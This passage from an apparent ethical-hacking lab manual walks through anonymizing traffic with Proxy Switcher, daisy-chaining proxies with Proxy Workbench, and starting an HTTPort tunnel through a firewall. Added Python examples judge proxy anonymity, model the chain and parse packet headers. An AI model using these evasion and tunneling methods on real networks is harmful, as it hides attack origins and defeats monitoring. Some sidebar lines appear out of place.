13. The downloaded proxy servers will appear in the Proxy Switcher window, grouped by category in the left panel.
[Screenshot: Proxy List Wizard, Common Tasks page: "Using this wizard you can quickly complete common proxy list management tasks. Click Finish to continue." Options: Find New Servers, Rescan Servers, Recheck Dead (selected); Find 100 New Proxy Servers; Find New Proxy Servers Located in a Specific Country; Rescan Working and Anonymous Proxy Servers. Buttons: Back, Finish, Cancel; checkbox "Show Wizard on Startup"]

FIGURE 12.8: Select common tasks

[Screenshot: Proxy List Wizard welcome page: "Welcome to the Proxy Switcher. Using this wizard you can quickly complete common proxy list management tasks. To continue, click Next."]

FIGURE 12.7: Proxy List wizard
[Screenshot: Proxy Switcher Unregistered (Direct Connection). The left panel is the Proxy Scanner tree: New (683), High Anonymous (0), SSL (0), Elite (0), Dead (2871), Permanently (6567), Basic Anonymity (301), Private (15), Dangerous (597), My Proxy Servers (0), ProxySwitcher (0). The right panel lists servers with State (Testing or Untested), Response time and Country. The status area shows the download in progress from Core ProxyNet, www.aliveproxy.com, www.cybersyndrome.net and www.nntime.com, with 1500 servers found so far]

FIGURE 12.9: List of downloaded proxy servers
14. To stop downloading proxy servers, click the control shown in the following figure.
[Screenshot: Proxy Switcher Unregistered (Direct Connection) after scanning. The tree now reads New (2195), Dead (1857), Permanently (6844), Basic Anonymity (162), Private (1), Dangerous (696); the right panel lists servers in the (Alive-SSL) state with their response times and countries (Hong Kong, Italy, Republic of Korea, Netherlands, Sweden, Czech Republic, United Arab Emirates, Syrian Arab Republic). The log at the bottom reports servers tested as [Dead] because the connection timed out; Keep Alive and Auto Switch are Disabled]

FIGURE 12.10: Click on Start button
15. Click Basic Anonymity in the left panel; the right panel shows the downloaded proxy servers in that category.

When Proxy Switcher is running in Keep Alive mode, it tries to maintain a working proxy server connection by switching to a different proxy server if the current one dies.

When the active proxy server becomes inaccessible, Proxy Switcher will pick a different server from the ProxySwitcher category. If the active proxy server is currently alive, the background will be green.
[Screenshot: Proxy Switcher with Basic Anonymity selected in the left tree; the right panel lists its servers with state, response time and country, for example 91.144.44.65:3128 (Alive-SSL, Syrian Arab Republic), 119.252.170.34:80 (Alive-SSL, Indonesia), 41.164.142.154:3128 (Alive-SSL, South Africa) and several servers in Brazil and the Republic of Korea. The log at the bottom shows the servers just tested as [Alive] and [(Alive-SSL)]]

FIGURE 12.11: Selecting downloaded proxy server from Basic Anonymity
16. Select one proxy server IP address in the right panel to switch to that proxy server, and click the icon shown in the following figure.
[Screenshot: Proxy Switcher Unregistered (Direct Connection) with a server highlighted in the right panel (the list includes 95.110.159.54:8080, Alive-SSL, Italy) and the toolbar icon used to switch to it. The log at the bottom shows 218.152.121.184:8080 and other servers tested as [Alive] and [(Alive-SSL)]]

FIGURE 12.12: Selecting the proxy server
17. The selected proxy server will connect, and the window will show the following connection status.

When running in Auto Switch mode, Proxy Switcher will switch active proxy servers regularly. The switching period can be set with a slider from 5 minutes to 10 seconds.

In addition to the standard add/remove/edit functions, the proxy manager contains functions useful for anonymous surfing and proxy availability testing.
[Screenshot: Proxy Switcher Unregistered (Active Proxy: 95.110.159.54:8080 - ITALY). The title bar now names the active proxy and the status bar shows the Basic Anonymity category; Keep Alive and Auto Switch remain Disabled]

FIGURE 12.13: Successful connection of selected proxy
18. Go to a web browser (Firefox) and type the URL http://www.proxyswitcher.com/check.php to check the connectivity of the selected proxy server; if it is successfully connected, the page shows the information in the following figure.
[Screenshot: Firefox, "Detecting your location" page at proxyswitcher.com, reporting:
Your possible IP address is: 202.53.11.130, 192.168.1.1
Location: Unknown
Proxy Information
Proxy Server: DETECTED
Proxy IP: 95.110.159.67
Proxy Country: Unknown]

FIGURE 12.14: Detected proxy server
19. Open another tab in the web browser, and surf anonymously using this proxy.

Starting from version 3.0, Proxy Switcher incorporates an internal proxy server. It is useful when you want to use other applications (besides Internet Explorer) that support an HTTP proxy via Proxy Switcher. By default it waits for connections on localhost:3128.
[Screenshot: Firefox with a Google search for "proxy server" performed through the active proxy. Google served its Italian site (google.it) and Italian-language results (Wikipedia "Proxy", Public Proxy Servers, ProxyServer.com, Proxoit) because the request arrived from the Italian proxy]

After the anonymous proxy servers have become available for switching, you can activate any one to become invisible to the sites you visit.

FIGURE 12.14: Surf using proxy server
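The check page in step 18 decides, from nothing but the request it receives, whether a proxy is in the path and which addresses the client can still be tied to; the same test is what any proxy-anonymity check applies. As an added example that is not the manual's, Proxy Switcher's or the check page's code (the page's source is not shown), the script below rebuilds that judgement: given the peer address the server saw and the headers the proxy forwarded, it reports the exposed client addresses and a level (transparent, anonymous, elite). The request captures are constructed: the addresses are the ones Figure 12.14 shows (proxy 95.110.159.67, possible client addresses 202.53.11.130 and 192.168.1.1); the Via value and the RFC 7239 Forwarded sample are made up.

```python
"""Judge a proxy the way a check page such as proxyswitcher.com/check.php does.

Added example for this lab; not code from the CEH manual, Proxy Switcher or
the check page (whose source is not shown). A server sees the proxy as the
TCP peer; whether the real client stays hidden depends on the headers the
proxy adds. The captures below are CONSTRUCTED: 95.110.159.67, 202.53.11.130
and 192.168.1.1 are the addresses in Figure 12.14, everything else is made
up. Levels use common proxy-judge terms, not the tool's category names.
"""
import ipaddress

# Headers that may carry the originating client's address.
FORWARDING_HEADERS = ("X-Forwarded-For", "Forwarded", "X-Real-IP", "Client-IP",
                      "X-Client-IP", "X-ProxyUser-IP")
# Headers that betray a proxy in the path even when they hide the client.
PROXY_MARKERS = ("Via", "X-Proxy-ID", "Proxy-Connection", "X-Forwarded-Host",
                 "X-Forwarded-Proto", "X-Cache")


def _addresses_in(value: str) -> list:
    """Every IP literal in a header value: comma-separated X-Forwarded-For
    chains and RFC 7239 'for=...;proto=...' pairs, with or without :port."""
    found = []
    for token in value.replace(";", ",").split(","):
        token = token.strip().strip('"')
        if token.lower().startswith("for="):
            token = token[4:].strip('"')
        if token.startswith("[") and "]" in token:          # bracketed IPv6 [addr]:port
            token = token[1:token.index("]")]
        for candidate in (token, token.rsplit(":", 1)[0]):  # second try drops an IPv4 :port
            try:
                found.append(ipaddress.ip_address(candidate))
                break
            except ValueError:
                continue
    return found


def classify_proxy(peer_ip: str, headers: dict) -> dict:
    """peer_ip: the TCP source the server saw, i.e. the proxy's egress address.
    transparent - a client address is exposed in a header
    anonymous   - no client address, but headers show a proxy is in the path
    elite       - nothing in the request indicates a proxy"""
    lower = {k.lower(): v for k, v in headers.items()}
    exposed = []
    for name in FORWARDING_HEADERS:
        for ip in _addresses_in(lower.get(name.lower(), "")):
            if str(ip) != peer_ip and ip not in exposed:   # the proxy naming itself is no leak
                exposed.append(ip)
    markers = [h for h in PROXY_MARKERS + FORWARDING_HEADERS if h.lower() in lower]
    level = "transparent" if exposed else "anonymous" if markers else "elite"
    return {
        "peer_ip": peer_ip,
        "level": level,
        "proxy_detected": level != "elite",
        "exposed_ips": [str(ip) for ip in exposed],
        "public_exposed": [str(ip) for ip in exposed if ip.is_global],
        "markers": markers,
    }


def judge_report(peer_ip: str, headers: dict) -> str:
    """The lines the check page prints, rebuilt from the classification."""
    r = classify_proxy(peer_ip, headers)
    possible = ", ".join(r["exposed_ips"]) or peer_ip
    return (f"Your possible IP address is: {possible}\n"
            f"Proxy Server: {'DETECTED' if r['proxy_detected'] else 'NOT DETECTED'}\n"
            f"Proxy IP: {peer_ip}\n"
            f"Anonymity level: {r['level']}")


# Constructed request captures: (peer address, headers as the server received them).
SAMPLES = {
    "lab_figure_12_14": ("95.110.159.67", {
        "Host": "www.proxyswitcher.com",
        "Via": "1.1 proxy.example.net",                   # made up
        "X-Forwarded-For": "202.53.11.130, 192.168.1.1",  # the two addresses the page listed
    }),
    "anonymous": ("95.110.159.67", {"Host": "www.proxyswitcher.com",
                                    "Via": "1.1 proxy.example.net"}),
    "elite": ("95.110.159.67", {"Host": "www.proxyswitcher.com",
                                "User-Agent": "Mozilla/5.0"}),
    "rfc7239": ("95.110.159.67", {
        "Forwarded": 'for="[2001:db8::10]:4711";proto=https, for=198.51.100.7:8080',
    }),
}

if __name__ == "__main__":
    for name, (peer, hdrs) in SAMPLES.items():
        print(f"--- {name}\n{judge_report(peer, hdrs)}")
```

The first sample reproduces the figure: the connection arrives from 95.110.159.67, yet the page can still list the client's addresses, so this server is transparent whatever category it sits in. Only a server that yields "elite" hides the client from a site that reads headers, and even then the proxy operator still sees all of the traffic.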
Lab Analysis

Document all the IP addresses of live (SSL) proxy servers and the connectivity you discovered during the lab. Note also what the check page reported as your possible IP address (202.53.11.130 and 192.168.1.1 in Figure 12.14): a proxy that passes those addresses on to the sites you visit does not hide you from them, even though the connection arrives from the proxy's own IP.
Tool/Utility: Proxy Switcher

Information Collected/Objectives Achieved:

Servers: list of available proxy servers

Selected Proxy Server IP Address: 95.110.159.54

Selected Proxy Country Name: ITALY

Resulting Proxy Server IP Address (as reported by the check page): 95.110.159.67
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Examine which technologies are used for Proxy Switcher.

2. Evaluate why Proxy Switcher is not open source.
Internet Connection Required

☑ Yes □ No

Platform Supported

☑ Classroom □ iLabs
Lab 13

Daisy Chaining using Proxy Workbench

Proxy Workbench is a unique proxy server, ideal for developers, security experts, and trainers, which displays data in real time.
Lab Scenario

You have learned in the previous lab how to hide your actual IP using Proxy Switcher and browse anonymously. Similarly, an attacker with malicious intent can pose as someone else using a proxy server and gather information like the account or bank details of an individual by performing social engineering. Once the attacker gains the relevant information, he or she can use that individual's bank account for online shopping. Attackers sometimes use multiple proxy servers for scanning and attacking, making it very difficult for administrators to trace the real source of attacks.

As an administrator, you should be able to detect such attacks by deploying an intrusion detection system, with which you can collect network information for analysis to determine if an attack or intrusion has occurred. You can also use Proxy Workbench to understand how networks are scanned.
Lab Objectives

This lab will show you how networks can be scanned and how to use Proxy Workbench. It will teach you how to:

■ Use the Proxy Workbench tool

■ Daisy chain the Windows host machine and virtual machines

Lab Environment

To carry out the lab, you need:

■ Proxy Workbench, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Workbench
■ You can also download the latest version of Proxy Workbench from this link: http://proxyworkbench.com

■ If you decide to download the latest version, then the screenshots shown in the lab might differ

■ A computer running Windows Server 2012 as attacker (host machine)

■ Another computer running Windows Server 2008, and Windows 7, as victim (virtual machine)

■ A web browser with Internet access

■ Follow the wizard-driven installation steps to install Proxy Workbench

■ Administrative privileges to run tools
L a b D u r a t i o n
T im e : 2 0 M in u t e s
Overview of Proxy Workbench
Proxy Workbench is a proxy server that displays its data in real time. It shows the data flowing between the web browser and the web server, and it even analyzes FTP in passive and active modes.
Lab Tasks
1. Install Proxy Workbench on all platforms of the Windows operating system (Windows Server 2012, Windows Server 2008, and Windows 7).
2. Proxy Workbench is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Workbench
3. You can also download the latest version of Proxy Workbench from this link http://proxyworkbench.com
4. Follow the wizard-driven installation steps and install it on all platforms of the Windows operating system.
5. This lab will work in the CEH lab environment - on Windows Server 2012, Windows Server 2008 and Windows 7.
6. Open the Firefox browser in your Windows Server 2012, go to Tools and click Options.
Security: Proxy servers provide a level of security within a network. They can help prevent security attacks as the only way into the network from the Internet is via the proxy server.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
FIGURE 13.1: Firefox options tab
7. Go to the Advanced profile in the Options wizard of Firefox, select the Network tab, and then click Settings.
FIGURE 13.2: Firefox Network Settings
The sockets panel shows the number of Alive socket connections that Proxy Workbench is managing. During periods of no activity this will drop back to zero.
8. Check Manual proxy configuration in the Connection Settings wizard.
9. Type HTTP Proxy as 127.0.0.1 and enter the port value as 8080, check the option Use this proxy server for all protocols, and click OK.
FIGURE 13.3: Firefox Connection Settings
10. While configuring, if you encounter any port error please ignore it.
11. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 13.4: Windows Server 2012 - Desktop view
12. Click the Proxy Workbench app to open the Proxy Workbench window.
The status bar shows the details of Proxy Workbench's activity. The first panel displays the amount of data Proxy Workbench currently has in memory. The actual amount of memory that Proxy Workbench is consuming is generally much more than this due to overhead in managing it.
Scan computers by IP range, by domain, single computers, or computers defined by the Global Network Inventory host file
FIGURE 13.5: Windows Server 2012 - Apps
13. The Proxy Workbench main window appears as shown in the following figure.
FIGURE 13.6: Proxy Workbench main window
14. Go to Tools on the toolbar, and select Configure Ports.
The events panel displays the total number of events that Proxy Workbench has in memory. By clearing the data (File -> Clear All Data) this will decrease to zero if there are no connections that are Alive.
The last panel displays the current time as reported by your operating system.
FIGURE 13.7: Proxy Workbench Configure Ports option
15. In the Configure Proxy Workbench wizard, select 8080 HTTP Proxy - Web in the left pane of Ports to listen on.
16. Check HTTP in the right pane of protocol assigned to port 8080, and click Configure HTTP for port 8080.
FIGURE 13.8: Proxy Workbench Configuring HTTP for Port 8080
17. The HTTP Properties window appears. Now check Connect via another proxy, enter your Windows Server 2003 virtual machine IP address in Proxy Server, enter 8080 in Port, and then click OK.
The 'Show the real time data window' option allows the user to specify whether the real-time data pane should be displayed or not.
People who benefit from Proxy Workbench:
Home users who have taken the first step in understanding the Internet and are starting to ask "But how does it work?"
People who are curious about how their web browser, email client or FTP client communicates with the Internet.
People who are concerned about malicious programs sending sensitive information out into the Internet. The information that programs are sending can be readily identified.
Internet software developers who are writing programs to existing protocols. Software development for the Internet is often very complex, especially when a program is not properly adhering to a protocol. Proxy Workbench allows developers to instantly identify protocol problems.
Internet software developers who are creating new protocols and developing the client and server software simultaneously. Proxy Workbench will help identify non-compliant protocol
Internet Security experts will benefit from seeing the data flowing in real-time. This will help them see who is doing what and when.
Many people understand sockets much better than they think. When you surf the web and go to a website called www.altavista.com, you are actually directing your web browser to open a socket connection to the server called "www.altavista.com" with port number 80.
FIGURE 13.9: Proxy Workbench HTTP for Port 8080
18. Click Close in the Configure Proxy Workbench wizard after completing the configuration settings.
The real time logging allows you to record everything Proxy Workbench does to a text file. This allows the information to be readily imported into a spreadsheet or database so that the most advanced analysis can be performed on the data.
19. Repeat the configuration steps of Proxy Workbench from Step 11 to Step 15 in the Windows Server 2008 Virtual Machines.
FIGURE 13.10: Proxy Workbench Configured proxy
20. In Windows Server 2008 type the IP address of the Windows 7 Virtual Machine.
21. Open a Firefox browser in Windows Server 2008 and browse web pages.
22. The traffic generated through Proxy Workbench is shown in the following figure of Windows Server 2008.
23. Check the To column; it is forwarding the traffic to 10.0.0.3 (Windows Server 2008 virtual Machine).
FIGURE 13.11: Proxy Workbench Generated Traffic in Windows Server 2012 Host Machine
24. Now log in to the Windows Server 2008 Virtual Machine, and check the To column; it is forwarding the traffic to 10.0.0.7 (Windows 7 Virtual Machine).
FIGURE 13.12: Proxy Workbench Generated Traffic in Windows Server 2003 Virtual Machine
Proxy Workbench changes this. Not only is it an awesome proxy server, but you can see all of the data flowing through it, visually display a socket connection history and save it to HTML.
And now, Proxy Workbench includes connection failure simulation strategies. What this means is that you can simulate a poor network, a slow Internet or an unresponsive server. This makes it the definitive TCP application tester.
25. Select On the web server, connect to port 80 in the Windows 7 virtual machine, and click OK.
It allows you to 'see' how your email client communicates with the email server, how web pages are delivered to your browser and why your FTP client is not connecting to its server.
FIGURE 13.13: Configuring HTTP properties in Windows 7
26. Now check the traffic in 10.0.0.7 (Windows 7 Virtual Machine); the "TO" column shows traffic generated from the different websites browsed in Windows Server 2008.
In the Connection Tree, if a protocol or a client/server pair is selected, the Details Pane displays the summary information of all of the socket connections that are in progress for the selected item on the Connection Tree.
FIGURE 13.14: Proxy Workbench Generated Traffic in Windows 7 Virtual Machine
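The daisy chain built in Steps 17 and 25 can be modelled in a few lines. The following is an added example, not code from the lab manual or from Proxy Workbench: it shows how a forwarding HTTP proxy handles a browser request in each of the two HTTP Properties modes and traces one request through the lab's three machines (127.0.0.1, 10.0.0.3 and 10.0.0.7 are the lab's addresses; the request text itself is constructed).

```python
"""Added example, not part of the CEH lab or Proxy Workbench: a model of
how a forwarding HTTP proxy decides where to send a browser request, in
the two modes of the HTTP Properties dialog ("Connect via another proxy"
vs. "On the web server, connect to port"). Addresses are the lab's;
the request text is constructed."""
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# A browser that is configured to use a proxy sends the request line in
# absolute form (scheme://host/path), as seen in Figure 13.6.
SAMPLE_REQUEST = (
    b"GET http://mail.google.com/mail/ HTTP/1.1\r\n"
    b"Host: mail.google.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:14.0) "
    b"Gecko/20100101 Firefox/14.0.1\r\n"
    b"Proxy-Connection: keep-alive\r\n"
    b"\r\n"
)


@dataclass
class Hop:
    """Where the proxy opens its next socket and what it writes to it."""
    host: str
    port: int
    payload: bytes


def route_request(request: bytes,
                  upstream_proxy: Optional[Tuple[str, int]] = None,
                  origin_port: int = 80) -> Hop:
    """Decide the next hop for one proxied HTTP request.

    upstream_proxy set  -> "Connect via another proxy" (Step 17): the
                           request is relayed unchanged to that proxy.
    upstream_proxy None -> "On the web server, connect to port" (Step 25):
                           connect to the host named in the URL and send
                           the request in origin form.
    """
    head, sep, body = request.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP request head")
    lines = head.split(b"\r\n")
    method, target, version = lines[0].split(b" ", 2)
    url = urlsplit(target.decode("ascii"))
    if url.scheme != "http" or not url.hostname:
        raise ValueError("a proxy request must carry an absolute http:// URL")

    if upstream_proxy is not None:
        # Daisy chain: the next proxy parses the same absolute URL itself.
        return Hop(upstream_proxy[0], upstream_proxy[1], request)

    # Last hop: rewrite the request line to origin form and drop the
    # hop-by-hop Proxy-Connection header, which must not reach the server.
    path = (url.path or "/") + ("?" + url.query if url.query else "")
    out = [b" ".join([method, path.encode("ascii"), version])]
    for line in lines[1:]:
        if not line.lower().startswith(b"proxy-connection:"):
            out.append(line)
    payload = b"\r\n".join(out) + b"\r\n\r\n" + body
    return Hop(url.hostname, url.port or origin_port, payload)


def trace_chain(request: bytes, proxies: List[Tuple[str, int]]) -> List[Hop]:
    """Follow a request through a chain of proxies, each configured to
    forward to the next one; the last proxy connects to the web server."""
    hops = []
    payload = request
    for i in range(len(proxies)):
        upstream = proxies[i + 1] if i + 1 < len(proxies) else None
        hop = route_request(payload, upstream_proxy=upstream)
        hops.append(hop)
        payload = hop.payload
    return hops


# The lab's chain: Firefox -> Proxy Workbench on the Windows Server 2012
# host (127.0.0.1:8080) -> Windows Server 2008 VM (10.0.0.3:8080) ->
# Windows 7 VM (10.0.0.7:8080) -> the web server on port 80.
LAB_CHAIN = [("127.0.0.1", 8080), ("10.0.0.3", 8080), ("10.0.0.7", 8080)]

if __name__ == "__main__":
    for n, hop in enumerate(trace_chain(SAMPLE_REQUEST, LAB_CHAIN), 1):
        # Each line is what that machine's "To" column would show. Only the
        # final hop sends a request in origin form, and the web server sees
        # only the last proxy as its client, which is why a chain of proxies
        # hides the real source, as the Lab Scenario describes.
        print("hop %d -> %s:%d" % (n, hop.host, hop.port))
        print("  " + hop.payload.split(b"\r\n", 1)[0].decode())
```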
Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.
Tool/Utility: Proxy Workbench
Information Collected/Objectives Achieved:
Proxy server used: 10.0.0.7
Port scanned: 8080
Result: Traffic captured by Windows 7 virtual machine (10.0.0.7)

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Examine the Connection Failure - Termination and Refusal.
2. Evaluate how real-time logging records everything in Proxy Workbench.
Internet Connection Required
☑ Yes ☐ No
Platform Supported
☑ Classroom ☐ iLabs
HTTP Tunneling Using HTTPort
HTTPort is a program from HTTHost that makes a transparent tunnel through a proxy server or firewall.
Lab Scenario
Attackers are always on the hunt for clients that can be easily compromised, and they can enter these networks with IP spoofing to damage or steal data. The attacker can get packets through a firewall by spoofing the IP address. If attackers are able to capture network traffic, as you have learned to do in the previous lab, they can perform Trojan attacks, registry attacks, password hijacking attacks, etc., which can prove to be disastrous for an organization's network. An attacker may use a network probe to capture raw packet data and then use this raw packet data to retrieve packet information such as source and destination IP address, source and destination ports, flags, header length, checksum, Time to Live (TTL), and protocol type.

Therefore, as a network administrator you should be able to identify attacks by extracting information from captured traffic such as source and destination IP addresses, protocol type, header length, source and destination ports, etc. and compare these details with modeled attack signatures to determine if an attack has occurred. You can also check the attack logs for the list of attacks and take evasive actions.

Also, you should be familiar with the HTTP tunneling technique, by which you can identify additional security risks that may not be readily visible by conducting simple network and vulnerability scanning, and determine the extent to which a network IDS can identify malicious traffic within a communication channel. In this lab you will learn HTTP Tunneling using HTTPort.
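As an added example (not part of the lab manual), the following code decodes the header fields the scenario lists from a raw IPv4/TCP packet, verifies the IPv4 header checksum, and compares the decoded fields with a simple modelled signature. The packet, the signature and its name PROXY_PORT_SYN are constructed for this example.

```python
"""Added example, not part of the CEH lab manual: decode the fields the
Lab Scenario lists (source/destination IP, ports, flags, header lengths,
checksum, TTL, protocol) from a raw IPv4/TCP packet, verify the IPv4
header checksum, and compare the result with a modelled signature.
The packet and the signature below are constructed."""
import socket
import struct

TCP_FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG", "ECE", "CWR"]
IPPROTO_TCP = 6


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 checksum: one's-complement of the one's-complement sum of
    the header's 16-bit words. Over a header whose checksum field is
    already filled in, the result is 0 when the header is intact."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_tcp(packet: bytes) -> dict:
    """Return the header fields of an IPv4 packet (and its TCP segment)."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or ihl < 20 or len(packet) < ihl:
        raise ValueError("not a well-formed IPv4 packet")
    info = {
        "src_ip": socket.inet_ntoa(src),
        "dst_ip": socket.inet_ntoa(dst),
        "ip_header_len": ihl,
        "total_len": total_len,
        "ttl": ttl,
        "protocol": proto,
        "ip_checksum": csum,
        "ip_checksum_ok": ipv4_checksum(packet[:ihl]) == 0,
    }
    if proto == IPPROTO_TCP:
        tcp = packet[ihl:]
        if len(tcp) < 20:
            raise ValueError("truncated TCP header")
        (sport, dport, _seq, _ack, off_flags, _win,
         tcp_csum, _urg) = struct.unpack("!HHIIHHHH", tcp[:20])
        flag_bits = off_flags & 0x01FF
        info.update({
            "src_port": sport,
            "dst_port": dport,
            "tcp_header_len": (off_flags >> 12) * 4,
            # The TCP checksum also covers a pseudo-header; it is reported
            # here but not verified.
            "tcp_checksum": tcp_csum,
            "flags": [name for i, name in enumerate(TCP_FLAG_NAMES)
                      if flag_bits & (1 << i)],
        })
    return info


def match_signature(info: dict, signature: dict) -> bool:
    """A modelled signature is a set of required field values; for
    'flags' every listed flag must be set (others may be set as well)."""
    for field, wanted in signature.items():
        if field == "flags":
            if not set(wanted) <= set(info.get("flags", [])):
                return False
        elif info.get(field) != wanted:
            return False
    return True


def build_sample_packet() -> bytes:
    """Constructed packet: a TCP SYN from 10.0.0.7:51199 to 10.0.0.3:8080
    (the lab's Windows 7 and Windows Server 2008 addresses), TTL 128."""
    tcp = struct.pack("!HHIIHHHH", 51199, 8080, 1000, 0,
                      (5 << 12) | 0x0002, 8192, 0, 0)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234,
                      0x4000, 128, IPPROTO_TCP, 0,
                      socket.inet_aton("10.0.0.7"),
                      socket.inet_aton("10.0.0.3"))
    csum = ipv4_checksum(hdr)  # computed with the checksum field zeroed
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + tcp


# A constructed signature: SYN segments aimed at the proxy port 8080.
PROXY_PORT_SYN = {"protocol": IPPROTO_TCP, "dst_port": 8080, "flags": ["SYN"]}

if __name__ == "__main__":
    fields = parse_ipv4_tcp(build_sample_packet())
    for key, value in fields.items():
        print("%-16s %s" % (key, value))
    print("matches PROXY_PORT_SYN:", match_signature(fields, PROXY_PORT_SYN))
```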
Lab Objectives
This lab will show you how networks can be scanned and how to use HTTPort and HTTHost.
Lab Environment
In the lab, you need the HTTPort tool.
■ HTTPort is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTPort
■ You can also download the latest version of HTTPort from the link http://www.targeted.org/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Install HTTHost on the Windows Server 2008 Virtual Machine
■ Install HTTPort on the Windows Server 2012 Host Machine
■ Follow the wizard-driven installation steps and install it.
■ Administrative privileges are required to run this tool
■ This lab might not work if the remote server filters/blocks HTTP tunneling packets
Lab Duration
Time: 20 Minutes
Overview of HTTPort
HTTPort creates a transparent tunnel through a proxy server or firewall. HTTPort allows all sorts of Internet software to be used from behind the proxy. It bypasses HTTP proxies, firewalls, and transparent accelerators.
Lab Tasks
Stopping IIS Services
1. Before running the tool you need to stop the IIS Admin Service and World Wide Web Publishing services on the Windows Server 2008 virtual machine.
2. Go to Administrative Privileges -> Services -> IIS Admin Service, right-click and click the Stop option.
HTTPort creates a transparent tunnel through a proxy server or firewall. This allows you to use all sorts of Internet software from behind the proxy.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
FIGURE 14.1: Stopping IIS Admin Service in Windows Server 2008
3. Go to Administrative Privileges > Services > World Wide Web Publishing Service, right-click it, and click the Stop option.
It bypasses HTTPS and HTTP proxies, transparent accelerators, and firewalls. It has a built-in SOCKS4 server.
FIGURE 14.2: Stopping World Wide Web Services in Windows Server 2008
4. Open the mapped network drive "CEH-Tools": Z:\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTHost
5. Open the HTTHost folder and double-click htthost.exe.
6. The HTTHost wizard will open; select the Options tab.
7. On the Options tab, leave all the settings at their defaults except the Personal Password field, which should be filled in with a password of your choice. In this lab, the personal password is "magic".
It supports strong traffic encryption, which makes proxy logging useless, and supports NTLM and other authentication schemes.
8. Check the Revalidate DNS names and Log connections options and click Apply.
[Screenshot: HTTHost 1.8.5 Options tab. Network settings: Bind external to 0.0.0.0 port 80, Bind listening to 0.0.0.0, Allow access from 0.0.0.0, Personal password, Pass through unrecognized requests to 127.0.0.1 port 81 with Original IP header field X-Original-IP, Timeouts, Max. local buffer; the Revalidate DNS names and Log connections check boxes and the Apply button.]
FIGURE 14.3: HTTHost Options tab
9. Now leave HTTHost intact, and don't turn off the Windows Server 2008 virtual machine.
10. Now switch to the Windows Server 2012 host machine and install HTTPort from D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTPort by double-clicking httport3snfm.exe.
11. Follow the wizard-driven installation steps.
12. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 14.4: Windows Server 2012 - Desktop view
13. Click the HTTPort 3.SNFM app to open the HTTPort 3.SNFM window.
To set up HTTPort, you need to point your browser to 127.0.0.1
HTTPort goes with the predefined mapping "External HTTP proxy" of local port
FIGURE 14.5: Windows Server 2012 - Apps
14. The HTTPort 3.SNFM window appears as shown in the figure that follows.
For each piece of software you create a custom mapping, given all the addresses it connects to. For applications that change their ports dynamically there is a SOCKS4 proxy mode, in which the software connects to the local SOCKS server that HTTPort runs on 127.0.0.1.
FIGURE 14.6: HTTPort Main Window
15. Select the Proxy tab and enter the host name or IP address of the targeted machine.
16. Here, as an example, enter the Windows Server 2008 virtual machine IP address, and enter Port number 80.
17. You cannot set the Username and Password fields.
18. In the Use personal remote host at section, click Start and then Stop, and then enter the targeted host machine IP address and port, which should be 80.
19. Here any password could be used. As an example, enter the password as "magic".
In a real-world environment, organizations sometimes use a password-protected proxy through which company employees access the Internet.
20. Select the Port mapping tab and click Add to create a New Mapping.
HTTHost supports registration, but it is free and password-free: you will be issued a unique ID, with which you can contact the support team and ask your questions.
21. Select the New Mapping node, right-click New Mapping, and click Edit.
FIGURE 14.8: HTTPort creating a New Mapping
FIGURE 14.7: HTTPort Proxy settings window
FIGURE 14.9: HTTPort editing to assign a mapping
22. Rename this to ftp certified hacker, and select the Local port node; then right-click, click Edit, and enter the port value 21.
23. Now right-click the Remote host node, click Edit, and rename it as ftp.certifiedhacker.com.
24. Now right-click the Remote port node, click Edit, and enter the port value 21.
FIGURE 14.10: HTTPort Static TCP/IP port mapping
25. Click Start on the Proxy tab of HTTPort to run the HTTP tunneling.
In this kind of environment, the federated search web part of Microsoft Search Server 2008 will not work out of the box, because only a non-password-protected proxy is supported.
FIGURE 14.11: HTTPort to start tunneling
26. Now switch to the Windows Server 2008 virtual machine and click the Application log tab.
27. Check the last line; if it reads Listener listening at 0.0.0.0:80, then it is running properly.
HTTP is the basis for Web surfing, so if you can freely surf the Web from where you are, HTTPort will bring you the rest of the Internet applications.
[Screenshot: HTTHost 1.8.5 Application log tab. The log reports the program start, the loaded security filters grant.dll and block.dll, the transfer encoding in use, and ends with the line "LISTENER: listening at 0.0.0.0:80".]
The aim is to make a data tunnel through the password-protected proxy, so that an external website can be mapped to a local port and the search results federated.
FIGURE 14.12: HTTHost Application log section
28. Now switch to the Windows Server 2012 host machine and turn ON the Windows Firewall.
29. Go to Windows Firewall with Advanced Security.
30. Select Outbound Rules from the left pane of the window, and then click New Rule in the right pane of the window.
FIGURE 14.13: Windows Firewall with Advanced Security window in Windows Server 2008
31. In the New Outbound Rule Wizard, select the Port option in the Rule Type section and click Next.
